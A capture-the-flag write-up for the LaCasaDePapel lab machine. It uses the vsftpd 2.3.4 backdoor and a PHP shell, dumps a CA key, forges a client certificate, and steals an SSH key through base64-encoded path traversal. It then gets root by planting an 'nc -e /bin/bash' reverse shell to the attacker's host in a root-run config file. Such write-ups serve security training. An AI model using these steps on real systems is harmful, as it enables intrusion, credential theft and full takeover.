LaCasaDePapel Writeup
Introduction :
LaCasaDePapel is an easy Linux box released back in March 2019.
Part 1 : Initial Enumeration
As always we begin our Enumeration using Nmap to enumerate opened ports. We will be using the flags -sC for default scripts and -sV to enumerate versions.
λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Netmon ]
→ ping 10.10.10.131
PING 10.10.10.131 (10.10.10.131) 56(84) bytes of data.
64 bytes from 10.10.10.131: icmp_seq=1 ttl=63 time=37.7 ms
64 bytes from 10.10.10.131: icmp_seq=2 ttl=63 time=140 ms
64 bytes from 10.10.10.131: icmp_seq=3 ttl=63 time=248 ms
^C
--- 10.10.10.131 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2003ms
rtt min/avg/max/mdev = 37.737/141.928/247.866/85.793 ms
λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Netmon ]
→ nmap -F 10.10.10.131
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-09 10:36 CET
Nmap scan report for 10.10.10.131
Host is up (0.34s latency).
Not shown: 96 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
443/tcp open https
Nmap done: 1 IP address (1 host up) scanned in 1.37 seconds
λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Netmon ]
→ nmap -sCV -p21,22,80,443 10.10.10.131
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-09 10:36 CET
Nmap scan report for 10.10.10.131
Host is up (0.19s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 03:e1:c2:c9:79:1c:a6:6b:51:34:8d:7a:c3:c7:c8:50 (RSA)
| 256 41:e4:95:a3:39:0b:25:f9:da:de:be:6a:dc:59:48:6d (ECDSA)
|_ 256 30:0b:c6:66:2b:8f:5e:4f:26:28:75:0e:f5:b1:71:e4 (ED25519)
80/tcp open http Node.js (Express middleware)
|_http-title: La Casa De Papel
443/tcp open ssl/http Node.js Express framework
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Server returned status 401 but no WWW-Authenticate header.
| ssl-cert: Subject: commonName=lacasadepapel.htb/organizationName=La Casa De Papel
| Not valid before: 2019-01-27T08:35:30
|_Not valid after: 2029-01-24T08:35:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
| tls-nextprotoneg:
| http/1.1
|_ http/1.0
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.73 seconds
Part 2 : Getting User Access
Our nmap scan picked up vsftpd 2.3.4 running on port 21, Let's run a quick searchsploit command to see if there are any popular exploits for us to use.
λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB ]
→ searchsploit vsftpd 2.3
---------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
---------------- ----------------------------------------
vsftpd 2.3.2 - | exploits/linux/dos/16270.c
vsftpd 2.3.4 - | exploits/unix/remote/17491.rb
---------------- ----------------------------------------
Shellcodes: No Result
Seems like there is a .rb script for us to use, which is most probably available for us within metasploit. Let's fire up msfconsole to see if we're correct.
msf5 > search vsftpd 2.3.4
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/gather/teamtalk_creds normal No TeamTalk Gather Credentials
1 exploit/multi/http/oscommerce_installer_unauth_code_exec 2018-04-30 excellent Yes osCommerce Installer Unauthenticated Code Execution
2 exploit/multi/http/struts2_namespace_ognl 2018-08-22 excellent Yes Apache Struts 2 Namespace Redirect OGNL Injection
3 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
The third one seems to be interesting , let's use it.
msf5 > use 3
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
RPORT 21 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.10.10.131
RHOSTS => 10.10.10.131
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
The only option that needs to be set is the RHOSTS one, we then hit exploit and see what results we're getting :
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
[*] 10.10.10.131:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.131:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
The exploit doesn't seem to work, Let's locate it, then copy it onto our local directory to examine it a little closer.
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exit
λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB ]
→ mkdir CasaDePapel
λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB ]
→ cd CasaDePapel
λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/CasaDePapel ]
→ locate 17491
/opt/metasploit/vendor/bundle/ruby/2.6.0/gems/metasploit-credential-3.0.3/db/migrate/20140722174919_old_creds_to_new_creds.rb
/usr/share/exploitdb/exploits/unix/remote/17491.rb
λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/CasaDePapel ]
→ cp /usr/share/exploitdb/exploits/unix/remote/17491.rb .
λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/CasaDePapel ]
→ nano 17491.rb
Looking at the code, we see that the exploit tries to connect to the 6200th port. Let's use telnet to see if we can connect to it manually.
λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/CasaDePapel ]
→ telnet 10.10.10.131 6200
Trying 10.10.10.131...
Connected to 10.10.10.131.
Escape character is '^]'.
Psy Shell v0.9.9 (PHP 7.2.10 — cli) by Justin Hileman
ls
Variables: $tokyo
ls
Variables: $tokyo
whoami
PHP Warning: Use of undefined constant whoami - assumed 'whoami' (this will throw an Error in a future version of PHP) in phar://eval()'d code on line 1
help
help Show a list of commands. Type `help [foo]` for information about [foo]. Aliases: ?
ls List local, instance or class variables, methods and constants. Aliases: list, dir
dump Dump an object or primitive.
doc Read the documentation for an object, class, constant, method or property. Aliases: rtfm, man
show Show the code for an object, class, constant, method or property.
wtf Show the backtrace of the most recent exception. Aliases: last-exception, wtf?
whereami Show where you are in the code.
throw-up Throw an exception or error out of the Psy Shell.
timeit Profiles with a timer.
trace Show the current call stack.
buffer Show (or clear) the contents of the code input buffer. Aliases: buf
clear Clear the Psy Shell screen.
edit Open an external editor. Afterwards, get produced code in input buffer.
sudo Evaluate PHP code, bypassing visibility restrictions.
history Show the Psy Shell history. Aliases: hist
exit End the current session and return to caller. Aliases: quit, q
whereami
From phar:///usr/bin/psysh/src/functions.php:307:
302| $config['colorMode'] = Configuration::COLOR_MODE_FORCED;
303| } elseif ($input->getOption('no-color')) {
304| $config['colorMode'] = Configuration::COLOR_MODE_DISABLED;
305| }
306|
> 307| $shell = new Shell(new Configuration($config));
308|
309|
310| if ($usageException !== null || $input->getOption('help')) {
311| if ($usageException !== null) {
312| echo $usageException->getMessage() . PHP_EOL . PHP_EOL;
history
show $tokyo
> 2| class Tokyo {
3| private function sign($caCert,$userCsr) {
4| $caKey = file_get_contents('/home/nairobi/ca.key');
5| $userCert = openssl_csr_sign($userCsr, $caCert, $caKey, 365, ['digest_alg'=>'sha256']);
6| openssl_x509_export($userCert, $userCertOut);
7| return $userCertOut;
8| }
9| }
Interestingly enough, the 4th line seems to pass the contents of a file named ca.key into the $caKey variable. Let's see what the contents of the ca.key are ourselves.
file_get_contents('/home/nairobi/ca.key');
=> """
-----BEGIN PRIVATE KEY-----\n
MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQDPczpU3s4Pmwdb\n
7MJsi//m8mm5rEkXcDmratVAk2pTWwWxudo/FFsWAC1zyFV4w2KLacIU7w8Yaz0/\n
2m+jLx7wNH2SwFBjJeo5lnz+ux3HB+NhWC/5rdRsk07h71J3dvwYv7hcjPNKLcRl\n
uXt2Ww6GXj4oHhwziE2ETkHgrxQp7jB8pL96SDIJFNEQ1Wqp3eLNnPPbfbLLMW8M\n
YQ4UlXOaGUdXKmqx9L2spRURI8dzNoRCV3eS6lWu3+YGrC4p732yW5DM5Go7XEyp\n
s2BvnlkPrq9AFKQ3Y/AF6JE8FE1d+daVrcaRpu6Sm73FH2j6Xu63Xc9d1D989+Us\n
PCe7nAxnAgMBAAECggEAagfyQ5jR58YMX97GjSaNeKRkh4NYpIM25renIed3C/3V\n
Dj75Hw6vc7JJiQlXLm9nOeynR33c0FVXrABg2R5niMy7djuXmuWxLxgM8UIAeU89\n
1+50LwC7N3efdPmWw/rr5VZwy9U7MKnt3TSNtzPZW7JlwKmLLoe3Xy2EnGvAOaFZ\n
/CAhn5+pxKVw5c2e1Syj9K23/BW6l3rQHBixq9Ir4/QCoDGEbZL17InuVyUQcrb+\n
q0rLBKoXObe5esfBjQGHOdHnKPlLYyZCREQ8hclLMWlzgDLvA/8pxHMxkOW8k3Mr\n
uaug9prjnu6nJ3v1ul42NqLgARMMmHejUPry/d4oYQKBgQDzB/gDfr1R5a2phBVd\n
I0wlpDHVpi+K1JMZkayRVHh+sCg2NAIQgapvdrdxfNOmhP9+k3ue3BhfUweIL9Og\n
7MrBhZIRJJMT4yx/2lIeiA1+oEwNdYlJKtlGOFE+T1npgCCGD4hpB+nXTu9Xw2bE\n
G3uK1h6Vm12IyrRMgl/OAAZwEQKBgQDahTByV3DpOwBWC3Vfk6wqZKxLrMBxtDmn\n
sqBjrd8pbpXRqj6zqIydjwSJaTLeY6Fq9XysI8U9C6U6sAkd+0PG6uhxdW4++mDH\n
CTbdwePMFbQb7aKiDFGTZ+xuL0qvHuFx3o0pH8jT91C75E30FRjGquxv+75hMi6Y\n
sm7+mvMs9wKBgQCLJ3Pt5GLYgs818cgdxTkzkFlsgLRWJLN5f3y01g4MVCciKhNI\n
ikYhfnM5CwVRInP8cMvmwRU/d5Ynd2MQkKTju+xP3oZMa9Yt+r7sdnBrobMKPdN2\n
zo8L8vEp4VuVJGT6/efYY8yUGMFYmiy8exP5AfMPLJ+Y1J/58uiSVldZUQKBgBM/\n
ukXIOBUDcoMh3UP/ESJm3dqIrCcX9iA0lvZQ4aCXsjDW61EOHtzeNUsZbjay1gxC\n
9amAOSaoePSTfyoZ8R17oeAktQJtMcs2n5OnObbHjqcLJtFZfnIarHQETHLiqH9M\n
WGjv+NPbLExwzwEaPqV5dvxiU6HiNsKSrT5WTed/AoGBAJ11zeAXtmZeuQ95eFbM\n
7b75PUQYxXRrVNluzvwdHmZEnQsKucXJ6uZG9skiqDlslhYmdaOOmQajW3yS4TsR\n
aRklful5+Z60JV/5t2Wt9gyHYZ6SYMzApUanVXaWCCNVoeq+yvzId0st2DRl83Vc\n
53udBEzjt3WPqYGkkDknVhjD\n
-----END PRIVATE KEY-----\n
"""
Seems like we have a private SSL key to work with ! let's save it locally as ca.key. Do not forget to remove the \n and the spaces at the beginning of the lines otherwise it won't be the exact same SSH key. Earlier on, our nmap scan picked up the 443rd port open running https, let's browse to it and see what we can work with.
Seems like we need to provide a certificate. So let's first add the casadepapel.htb hostname to our /etc/hosts file.
127.0.0.1 localhost
127.0.1.1 Prometheus
10.10.10.131 casadepapel.htb
navigating over to https://10.10.10.131/ > connection > more information > security > view certificate > details > export and now we have the ca.key and ca.crt
λ nihilist [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
→ openssl pkey -in ca.key -pubout
-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAz3M6VN7OD5sHW+zCbIv/
5vJpuaxJF3A5q2rVQJNqU1sFsbnaPxRbFgAtc8hVeMNii2nCFO8PGGs9P9pvoy8e
8DR9ksBQYyXqOZZ8/rsdxwfjYVgv+a3UbJNO4e9Sd3b8GL+4XIzzSi3EZbl7dlsO
hl4+KB4cM4hNhE5B4K8UKe4wfKS/ekgyCRTRENVqqd3izZzz232yyzFvDGEOFJVz
mhlHVypqsfS9rKUVESPHczaEQld3kupVrt/mBqwuKe99sluQzORqO1xMqbNgb55Z
D66vQBSkN2PwBeiRPBRNXfnWla3Gkabukpu9xR9o+l7ut13PXdQ/fPflLDwnu5wM
ZwIDAQAB
-----END PUBLIC KEY-----
λ nihilist [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
→ openssl x509 -in ca.crt -pubkey -noout
-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAz3M6VN7OD5sHW+zCbIv/
5vJpuaxJF3A5q2rVQJNqU1sFsbnaPxRbFgAtc8hVeMNii2nCFO8PGGs9P9pvoy8e
8DR9ksBQYyXqOZZ8/rsdxwfjYVgv+a3UbJNO4e9Sd3b8GL+4XIzzSi3EZbl7dlsO
hl4+KB4cM4hNhE5B4K8UKe4wfKS/ekgyCRTRENVqqd3izZzz232yyzFvDGEOFJVz
mhlHVypqsfS9rKUVESPHczaEQld3kupVrt/mBqwuKe99sluQzORqO1xMqbNgb55Z
D66vQBSkN2PwBeiRPBRNXfnWla3Gkabukpu9xR9o+l7ut13PXdQ/fPflLDwnu5wM
ZwIDAQAB
-----END PUBLIC KEY-----
λ nihilist [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
→ openssl x509 -in ca.crt -pubkey -noout | grep md5sum
λ nihilist [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
→ openssl x509 -in ca.crt -pubkey -noout | md5sum
71e2b2ca7b610c24d132e3e4c06daf0c -
λ nihilist [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
→ openssl pkey -in ca.key -pubout | md5sum
71e2b2ca7b610c24d132e3e4c06daf0c -
so here we see that the md5 hashes of both the public keys are the same, therefore it means that the public key is valid. From there, we need to generate a 4096 bit key and create a certificate signing request that we'll name client.csr
λ nihilist [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
→ openssl genrsa -out client.key 4096
Generating RSA private key, 4096 bit long modulus (2 primes)
......................................................................++++
.............................................++++
e is 65537 (0x010001)
λ nihilist [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
→ ls
ca.crt ca.key client.key
λ nihilist [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
→ openssl req -new -key client.key -out client.csr
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:US
State or Province Name (full name) [Some-State]:NY
Locality Name (eg, city) []:NYC
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Marvel
Organizational Unit Name (eg, section) []:DC
Common Name (e.g. server FQDN or YOUR name) []:nihilist
Email Address []:nihilist@prometheus.com
Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:
λ nihilist [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
→ ls
ca.crt ca.key client.csr client.key
λ nihilist [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
→ ls
ca.crt ca.key client.csr client.key
λ nihilist [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
→ openssl x509 -req -in client.csr -CA ca.crt -CAkey ca.key -set_serial 9001 -extensions client -days 365 -outform PEM -out client.cer
Signature ok
subject=C = US, ST = NY, L = NYC, O = Marvel, OU = DC, CN = nihilist, emailAddress = nihilist@prometheus.com
Getting CA Private Key
λ nihilist [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
→ openssl pkcs12 -export -inkey client.key -in client.cer -out client.p12
Enter Export Password:
Verifying - Enter Export Password:
λ nihilist [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
→ ls
ca.crt ca.key client.cer client.csr client.key client.p12
And we are in ! now we are able to enumerate the box further, from here we see that clicking on season1 then shows us a bunch of avi files to download, hovering over them, we see that their hyperlink is base64 encoded, and barely changing, so let's try getting some LFI.
λ nihilist [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
→ curl -sk https://lacasadepapel.htb/file/Li4vLnNzaC9pZF9yc2E\=
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
Looks like we found a private key ! let's try logging in as one of the users :
λ nihilist [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
→ curl -sk https://lacasadepapel.htb/file/Li4vLnNzaC9pZF9yc2E\= > privatekey
λ nihilist [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
→ chmod 600 privatekey
λ nihilist [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
→ ssh -i privatekey professor@10.10.10.131
The authenticity of host '10.10.10.131 (10.10.10.131)' can't be established.
ECDSA key fingerprint is SHA256:rA99W+GVzo0hlABp1vMj9ChhjLwybPhHTpb65AWm7xI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.131' (ECDSA) to the list of known hosts.
_ ____ ____ ____ _
| | __ _ / ___|__ _ ___ __ _ | _ \ ___ | _ \ __ _ _ __ ___| |
| | / _` | | | / _` / __|/ _` | | | | |/ _ \ | |_) / _` | '_ \ / _ \ |
| |__| (_| | | |__| (_| \__ \ (_| | | |_| | __/ | __/ (_| | |_) | __/ |
|_____\__,_| \____\__,_|___/\__,_| |____/ \___| |_| \__,_| .__/ \___|_|
|_|
lacasadepapel [~]$ whoami
professor
lacasadepapel [~]$ cd /home/professor && ls
memcached.ini memcached.js node_modules
lacasadepapel [~]$
and we are logged in ! however we still need to escalate privileges to be able to print out the flags. printing out the file memcached.ini we see some kind of a command being run and the file itself is owned by root. changing it we should be able to privesc.
Terminal 1:
lacasadepapel [~]$ which nc
/usr/bin/nc
lacasadepapel [~]$ vi memcached.ini
[program:memcached]
command = sudo -u root /usr/bin/nc 10.10.14.7 1234 -e /bin/bash
Terminal 2:
λ nihilist [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
→ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.131] 43309
python -c 'import pty;pty.spawn("/bin/bash");'
bash-4.4# whoami
whoami
root
cd /home
bash-4.4# ls
ls
berlin dali nairobi oslo professor
bash-4.4# cd berlin
cd berlin
bash-4.4# ls
ls
downloads node_modules server.js user.txt
bash-4.4# cat user.txt
cat user.txt
4dXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
and we are logged in as root ! all that's left to do is printing our flags.
Part 3 : Getting Root Access
bash-4.4# cat /root/root.txt
cat /root/root.txt
58XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Conclusion
Here we can see the progress graph :
Nihilist
8AUYjhQeG3D5aodJDtqG499N5jXXM71gYKD8LgSsFB9BUV1o
7muLv3DXHoydRTK4SZaaUBq4EAUqpZHLrX2VZLH71Jrd9k8 Donate XMR to Nihilist: